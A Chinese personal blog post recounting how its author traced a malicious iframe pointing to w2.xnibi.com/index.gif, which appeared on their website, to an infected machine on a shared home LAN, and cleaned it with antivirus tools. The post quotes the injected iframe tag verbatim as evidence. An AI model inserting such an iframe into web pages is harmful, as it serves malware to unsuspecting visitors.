1 ge

8166

让我备感头疼的w2.xnibi.com/index.gif病毒查杀全过程

前几天，习惯性的打开我的网站 http://www.gulongbbs.com/ 发现有一个页面被加载进来，NOD32提示发现病毒。网页左下角出现网页错误的提示，查看网页的源代码，发现第一行被加了如下代码：，<iframe src=http://w2.xnibi.com/index.gif width=100 height=1></iframe>。第一反应是网站被黑，网页被加上了框架。

打电话给服务商，服务商说服务器正常，我让他打开我的网站，看看浏览器左下角有没有提示错误，他截图过来，一切正常。奇怪了！

连上FTP，查看文件的修改时间，没有发现最近有文件被修改的痕迹。看来是冤枉了服务商，可能是我机器的问题。但我的机器一直装着NOD32，中毒的可能性很小。

在百度、google、雅虎通通搜索了一遍，中此病毒的朋友不在少数，但真正的解决方案却没有，无非是安全模式下查杀，清理IE临时文件，安装ARP防火墙之类的建议。戴尔的工程师居然建议用户重装系统，格式化硬盘，戴尔的工程不过如此。

我试了一切办法，清理了临时文件，断网杀毒，用360清理木马，用恶意软件清理助手清理恶意软件，换了最新的卡巴8.0，居然连提示都没有，最后还是换回了NOD32。最后用金山清理专家测试电脑健康程度，除我修改了IE首页被扣去一分外，得了99分。

本机应该是没有任何问题了，但w2.xnibi.com/index.gif病毒的问题依然存在，问题只有出在局域网里，病毒像是ARP病毒，但我装了彩影的ARP防火墙、金山的ARP防火墙、360的ARP防火墙，没有提示有ARP欺骗，真郁闷了。这给我网站的管理工作带来极大不便，打开网站会导致网页变形，因为网站的后台大多是框架结构，造成后台无法打开，无法更新网站。

今天打开电脑，只能打开QQ，网易只能勉强打开，一些速度稍慢的网站甚至无法打开，看来情况越来越严重了。不解决这个问题是不行了。

我用的网络是从同事家扯到我办公室的，四家共用一个2MB的ADSL，平时他们去上班不能上网，只我一个人可以上，可以独享带宽。他们下班后上网，我也回家了，互不影响。

最近出现这个问题，据我推测是学生放暑假了，有学生在家上网，而电脑上有病毒，从而攻击整个局域网。打电话一一排除，发现其中一个同事的女儿在家上网，先通知了她一下，说她家的电脑有病毒，我过去看看。

同事的女儿正在弄QQ空间，电脑表面一切正常，打开网页，居然没有w2.xnibi.com/index.gif病毒加载。大体看了一下，电脑上装了卡巴7.0，但没在运行。用360查出16个恶意软件，16个系统漏洞，卸载卡巴装上NOD32　3.0，刚装上就频繁提示有病毒。清理临时文件，打上补丁，清理了恶意软件，清理自启动项目，重启机器，清理C盘病毒，忙了近一个小时。

最后还是有问题，系统时间被修改，向前提早了6年，造成NOD32变成红色，本想完全解决掉，但看同事的女儿已经有些不耐，病毒应该不多了，算了吧。

回到办公室，清理IE临时文件，重启机器，世界又变得清静了。

juan20040320